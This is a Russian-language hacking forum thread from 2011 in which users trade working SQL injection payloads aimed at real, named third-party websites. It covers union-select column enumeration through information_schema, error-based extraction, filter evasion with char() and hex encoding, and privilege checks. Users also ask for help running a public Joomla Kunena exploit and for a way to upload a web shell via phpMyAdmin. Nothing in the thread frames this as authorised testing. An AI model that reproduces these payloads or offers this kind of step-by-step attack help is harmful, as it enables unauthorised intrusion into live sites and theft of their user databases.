Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,?,4,5,6,7+from+users+limit+0,1--
    
    не могу найти колонку с именем юзера
     
  2. baobabeng

    baobabeng Member

    Joined:
    2 Mar 2011
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    information_schema доступна, в чём проблема?
     
  3. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Code:
    http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name='users'--
    
    или я что-то не так делаю?
     
  4. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    зачарь

    http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name=char(117,115,101,114,115)

    users=char(117,115,101,114,115)
     
    #16384 noviyuser, 14 Mar 2011
    Last edited: 14 Mar 2011
    1 person likes this.
  5. baobabeng

    baobabeng Member

    Joined:
    2 Mar 2011
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
     
  6. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    при нахождении столбцов через order_by и последующей комбинации их с union select вылетаешь ошибка
    Code:
    The used SELECT statements have a different number of columns
    
    что можно сделать?
     
  7. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    2 запроса. Крути через ошибку. Или линк сюда.
    http://forum.antichat.net/thread43966.html последний пост от Scipio.
    Через ошибку:
    Code:
    http://www.cosmeticsdatabase.com/brand.php?brand_id=987%20or%201%20group%20by%20concat((select%20version()),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%201
    С прямым выводом:
    Code:
    http://www.cosmeticsdatabase.com/ingredient.php?ingred06=-705545%20union%20select%201,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
    Жмешь "QUOTE" и смотришь что он там написал в теге
     
    #16387 Фараон, 14 Mar 2011
    Last edited: 14 Mar 2011
    1 person likes this.
  8. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7,8--
     
    #16388 Compton, 14 Mar 2011
    Last edited: 14 Mar 2011
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
  10. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    При проверке file_priv выдалось
    SELECT command denied to user 'g4rt'@'localhost' for table 'user'
    это типа в доступе к file_priv отказано, да?
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Это значит что отказано в доступе к базе данных под именем "mysql" и к таблице "mysql.user" в частности, соответственно, в большинстве случаев file_priv тоже нет.
     
    #16391 попугай, 15 Mar 2011
    Last edited by a moderator: 15 Mar 2011
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Привет всем!
    В общем захотелось заняться пентестом джумлы)
    нашел на сайте уязвимый Joomla Kunena Forums
    также для него нашел эксплойт под BSQL
    http://www.exploit-db.com/exploits/9408/

    Подскажите пожалуйста как заюзать эксплойт?
    в эксплойте написано
    понятно что юзать скрипт надо по шаблону вида
    exploit.php?site=http://joomlasite.... но вот не понятно на какую именно страницу надо передавать!

    Может кто пояснить?
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    на страницу, в которой есть уязвимый параметр. и передавать нужно последним параметр(в случае если их несколько)
     
    1 person likes this.
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.rxinternational.com/pricelist.asp?mscquery=spray'
    не могу раскрутить
     
  15. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    208
    Likes Received:
    279
    Reputations:
    32
    Microsoft Access
    Рекомендую прочесть эту статью:
    http://forum.antichat.ru/threadnav50550-1-10.html
     
  16. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    http://minysa.ru/infusions/mp3/song.php?song_id=-340'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--'
    При вставке слов страница не загружается, как обойти?
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    скобки нельзя использовать
    Code:
    http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19--%27
    
    предсказывая следующий вопрос, можно сделать так:
    Code:
    http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19+from+information_schema.tables+limit+17,1--%20%27
    
     
    #16397 Seravin, 15 Mar 2011
    Last edited: 15 Mar 2011
  18. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Возможно ли вотэто как либо использовать?
    http://www.gamereplays.org/community/index.php?act=SF&f=99999999
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Нет, данная переменная принимает только числа.
    Может начнем статьи читать и немного изучим PHP + MySQL?
    //и начнём читать статьи прежде чем задать вопрос
     
    #16399 Tigger, 15 Mar 2011
    Last edited by a moderator: 16 Mar 2011
    1 person likes this.
  20. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста

    Объясните плиз вот это
    https://forum.antichat.ru/showpost.php?p=1323558&postcount=12
     
    #16400 noviyuser, 16 Mar 2011
    Last edited: 16 Mar 2011
Thread Status:
Not open for further replies.